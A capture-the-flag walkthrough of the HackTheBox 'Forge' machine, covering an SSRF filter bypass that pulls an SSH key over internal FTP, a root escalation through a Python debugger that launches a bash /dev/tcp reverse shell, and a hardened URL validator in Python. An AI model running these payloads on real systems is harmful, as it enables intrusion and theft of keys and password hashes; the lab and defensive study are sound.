In this post, I would like to share a walkthrough of the Forge machine from HackTheBox.


This machine is rated medium difficulty on HackTheBox.


Source: Hack the Box

What will you gain from the Forge machine?


For the user flag, you will exploit an SSRF vulnerability in the website to fetch useful information from the server.


For the root flag, you will run some Python code inside a PDB session that is spawned by the SUID file.

Information Gathering


Once we have started the VPN connection (the configuration file is downloaded from HackTheBox), we can start the information gathering on the machine by executing the command nmap -sC -sV -p- -Pn <IP Address>

# Nmap 7.91 scan initiated Sat Sep 11 23:31:29 2021 as: nmap -sV -sC -oA intial -Pn 10.129.210.60
Nmap scan report for 10.129.210.60
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4f:78:65:66:29:e4:87:6b:3c:cc:b4:3a:d2:57:20:ac (RSA)
|   256 79:df:3a:f1:fe:87:4a:57:b0:fd:4e:d0:54:c6:28:d9 (ECDSA)
|_  256 b0:58:11:40:6d:8c:bd:c5:72:aa:83:08:c5:51:fb:33 (ED25519)
80/tcp open     http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://forge.htb
Service Info: Host: 10.129.210.60; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 11 23:32:11 2021 -- 1 IP address (1 host up) scanned in 42.51 seconds

The scan shows the following ports of interest:

  • 21 – ftp
  • 22 – ssh
  • 80 – http

Let’s try to access the website interface.

Source: Forge Website interface

Nothing of interest here except the “Upload an Image” function.


Before using “Upload an Image”, we can enumerate the directories on the main domain.


However, there is no interesting directory that we can access.


On the “Upload an Image” page, we can see two functions: Upload local file and Upload from URL.


I have tried to upload some random files and received responses as shown above.


After a while, I managed to find some useful files at forge.htb/announcement.


We got the link, so let’s download the file to our machine.


Inside the file, we gathered a lot of information, such as credentials and a list of ports that are open on the machine.


I tried to access the machine via FTP, but sadly that was a dead end.


I was stuck on the FTP access, and I had a thought that there might be a subdomain for the machine. As a result, let’s enumerate the subdomains (if any) with the gobuster vhost function.


After a few minutes, we noticed admin.forge.htb, which returns status 200.


Sadly, the page only shows the text “Only localhost is allowed!”, so we are stuck again.

Gaining Privileged Access


In the Burp Suite request for the Upload function, I notice the request body (url=test.com&remote=1) after the Sec-GPC header.


Let’s do some research on the attack, which I believe is an SSRF attack.

Source: What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy (portswigger.net)

Let’s review what we have obtained until right now:

  • Subdomain: admin.forge.htb (only localhost is allowed)
  • ftp, ftps, http and https are open on the machine, but only reachable from localhost
  • Credentials (username=user, password=heightofsecurity123!)

SSRF attack on forge.htb


Let’s apply the SSRF technique we learned from portswigger.net to the upload request in Burp Suite.


We insert the payload in the url field as shown above.


The payload would be something like http://admin.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/id_rsa&remote=1 (where I try to obtain the SSH id_rsa).


From the inspection in Burp Suite, we move to the Repeater to understand the flow of the process. However, there’s an error: “URL contains a blacklisted address!”


Let’s try to change the subdomain to ADMIN.FORGE.htb and use another loopback address instead of 127.0.0.1, such as 127.0.0.3.
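The two changes above work because the filter compares the raw URL string against a blacklist: a different letter case in the hostname and a different address in the 127.0.0.0/8 range are both "new" strings to it, even though they reach the same host. The following is an added example (not code from the Forge machine or from this post) that models such a filter and places a hardened validator beside it. The blacklist contents, the stand-in DNS table and all URLs are constructed assumptions; the hardened version parses the URL, allows only http/https, rejects embedded credentials, and resolves the hostname before checking whether the resulting address is globally routable.

```python
import ipaddress
from urllib.parse import urlparse

# Model of a string-based blacklist filter (assumption, not the real Forge
# source). A case-sensitive substring match explains the behaviour seen on
# the page: ADMIN.FORGE.htb and 127.0.0.3 pass, admin.forge.htb and 127.0.0.1 do not.
BLACKLIST = ("localhost", "127.0.0.1", "admin.forge.htb")


def weak_is_blocked(url: str) -> bool:
    """Naive filter: block the URL if any blacklisted substring appears in it."""
    return any(bad in url for bad in BLACKLIST)


# Constructed stand-in for DNS so the example runs offline. In a real service
# you would call socket.getaddrinfo() and check every returned address.
FAKE_DNS = {
    "forge.htb": "10.129.210.60",
    "admin.forge.htb": "127.0.0.1",
    "example.com": "1.2.3.4",  # constructed "public" address
}


def hardened_is_blocked(url: str) -> tuple:
    """Parse-then-resolve validator. Returns (blocked, reason)."""
    parsed = urlparse(url)

    # Only fetch over the schemes the feature actually needs.
    if parsed.scheme not in ("http", "https"):
        return True, "scheme %r not allowed" % parsed.scheme

    # urlparse already lowercases .hostname; lower() again for clarity.
    host = (parsed.hostname or "").lower().rstrip(".")
    if not host:
        return True, "missing host"

    # Credentials in the URL are a sign of an attempt to reach an internal service.
    if parsed.username or parsed.password:
        return True, "credentials in URL not allowed"

    # Literal IP (v4 or v6) or a name that must be resolved.
    try:
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        if host == "localhost" or host.endswith(".localhost"):
            return True, "localhost is not allowed"
        if host not in FAKE_DNS:
            return True, "unresolvable host"
        addresses = [ipaddress.ip_address(FAKE_DNS[host])]

    # Decide on the resolved address, not on the spelling of the hostname.
    # is_global is False for loopback, RFC 1918, link-local, 0.0.0.0, ::1, etc.
    for ip in addresses:
        if not ip.is_global:
            return True, "%s is not a public address" % ip
    return False, "ok"


# Constructed test URLs mirroring the shapes discussed on the page.
CASES = {
    "public": "http://example.com/image.png",
    "blacklisted": "http://admin.forge.htb/announcements",
    "case_variant": "http://ADMIN.FORGE.htb/announcements",
    "other_loopback": "http://127.0.0.3/",
    "ipv6_loopback": "http://[::1]/",
    "inner_ftp": "ftp://user:pass@127.0.0.3/",
}


def compare_filters(cases=CASES) -> dict:
    """Return {name: (weak_blocked, hardened_blocked)} for each constructed URL."""
    return {name: (weak_is_blocked(u), hardened_is_blocked(u)[0]) for name, u in cases.items()}


if __name__ == "__main__":
    for name, (weak, hard) in compare_filters().items():
        print("%-15s weak=%-5s hardened=%s" % (name, weak, hard))
```

The comparison shows the weak filter letting the case variant, the alternative loopback address and the nested ftp:// URL through, while the hardened validator rejects all of them and still permits a genuinely external address. Note that the validation must run on every hop: the admin service that fetches the nested u= parameter needs the same check as the public upload form.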


Voila! Finally, we got a link to download something from the machine.


Let’s retrieve the file using wget so that we can read its content.


After multiple tries, we retrieved the SSH id_rsa.


Let’s access the machine via SSH using the id_rsa we obtained previously.

Maintaining Access on the Forge Machine


At last, we are able to access the machine.


You can read the user flag by typing the “cat user.txt” command.

Escalating to Root Privileges


In order to escalate to root privileges, we need to find a SUID file that we can abuse. To find that SUID file, we can run a simple command such as “sudo -l”.


We need to understand the SUID file by reading its contents. I notice there’s a password (secretadminpassword) that we might be using later.


Without further ado, let’s run the SUID file. I notice the output looks like a netcat listener.


There might be a way to get a response from the machine.


Let’s open another SSH session in a different terminal.


We should try to telnet to localhost on the port given by the SUID file. Oh wow! It works, and it asks for the secret password, which might be the password we found inside the SUID file.


Gotcha! Now, let’s enter any input that is not one of the listed options.


The SUID file responds with a PDB prompt. From my experience, PDB is probably the Python Debugger.


However, it doesn’t do any harm to double-check on the internet.


It’s the Python Debugger, as I expected.


Before we execute any Python code in PDB, our nc listener needs to be started.


Let’s run a simple piece of Python code that will send a reverse shell connection back to us.


For instance, the code can be seen below:

import os
os.system("bash -c 'bash -i >& /dev/tcp/<Your IP>/<Port> 0>&1'")

Success! We now have a root reverse shell connection back to us.


As usual, we can read the root flag by executing the “cat /root/root.txt” command.


-THE END-


Happy Learning Guys!

Extra Information


We can read /etc/shadow to obtain the hash that unlocks the official write-up on HackTheBox.